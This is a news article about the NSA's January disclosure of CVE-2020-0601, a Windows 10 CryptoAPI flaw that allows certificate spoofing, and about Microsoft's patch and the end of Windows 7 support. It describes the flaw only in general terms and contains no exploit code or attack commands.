The United States National Security Agency (NSA) has uncovered and exposed an extremely serious security flaw in Microsoft’s Windows 10 CryptoAPI service. Publicly announced by the intelligence agency, the vulnerability relates to cryptographic signatures, or the digitally generated certificates used to authenticate HTTPS connections, apps and executable code.

Described by expert security researcher Brian Krebs as being “extraordinarily serious”, left unpatched the bug could potentially allow malicious actors to spoof certificates and disguise malware or other nefarious pieces of software without the operating systems detection or users’ knowledge.

Made public on the 14th of January, Microsoft quickly worked to patch the Windows 10 Security Flaw, whilst advising systems administrators to deploy updates immediately. Stating that they do not believe this vulnerability has thus far been exploited, Microsoft also worked with managers of key internet infrastructure and military entities to secure networks prior to the flaw being announced.

“NSA assesses the vulnerability to be severe and that sophisticated cyber actors will understand the underlying flaw very quickly and, if exploited, would render the previously mentioned platforms as fundamentally vulnerable”

National Security Agency

The announcement of this exploit comes at a time when Microsoft are also ceasing updates to Windows 7. Initially released in 2009, the operating system will no longer be considered secure without patches and support being issued; users are strongly advised to update their systems and to move away from Windows 7.

As the most used operating system, Windows 10 if left unpatched, could have left over 900 million devices vulnerable to attack, again emphasising the importance of vulnerability testing and regular updates. Though it’s not known exactly when the vulnerability was discovered, it is believed that previous exploits, such as EternalBlue, were utilised by the agency for five years before being disclosed and fixed.

“[We are] recommending that network owners expedite implementation of the patch immediately as we will also be doing…when we identified a broad cryptographic vulnerability like this, we quickly turned to work with the company to ensure that they could mitigate it.”

Anne Neuberger, NSA’s Cybersecurity Directorate

Likely part of a new transparency initiative, the NSA has previously faced criticism for its security and intelligence gathering practices. With this disclosure, the agency is perhaps hoping to soften its image as well as contributing to industry best practices; similar to that of Google’s Project Zero, a security team dedicated to finding and safely exposing zero-day vulnerabilities.

As systems administrators work to secure networks, we are once again reminded of the vulnerabilities that threaten even the most modern and secure systems available. If exploited, vulnerability CVE-2020-0601 could have facilitated immeasurable damage and threatened the information security of individuals and organisations the world over.